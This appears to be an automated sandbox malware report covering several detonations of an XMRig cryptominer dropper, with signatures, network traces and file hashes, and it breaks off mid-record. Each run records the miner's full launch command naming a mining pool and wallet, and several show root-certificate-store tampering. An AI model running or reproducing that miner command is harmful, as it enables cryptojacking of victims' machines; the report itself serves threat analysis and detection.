US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:51

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.147:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 147.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:55

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.193:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 193.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
NL 23.62.61.193:443 www.bing.com tcp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
NL 23.62.61.193:443 www.bing.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:57

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1806s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:00

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (hex-encoded X.509 certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (hex-encoded X.509 certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3148,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4076,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=4216 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral19

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:10

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral20

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:11

Platform

win10v2004-20240508-en

Max time kernel

1799s

Max time network

1789s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1516 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 1516 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 23.62.61.161:443 www.bing.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 161.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
NL 23.62.61.161:443 www.bing.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.167.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


memory/3388-79-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-80-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-81-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-82-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-83-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-84-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:51

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1810s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob omitted) C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:52

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob omitted) C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
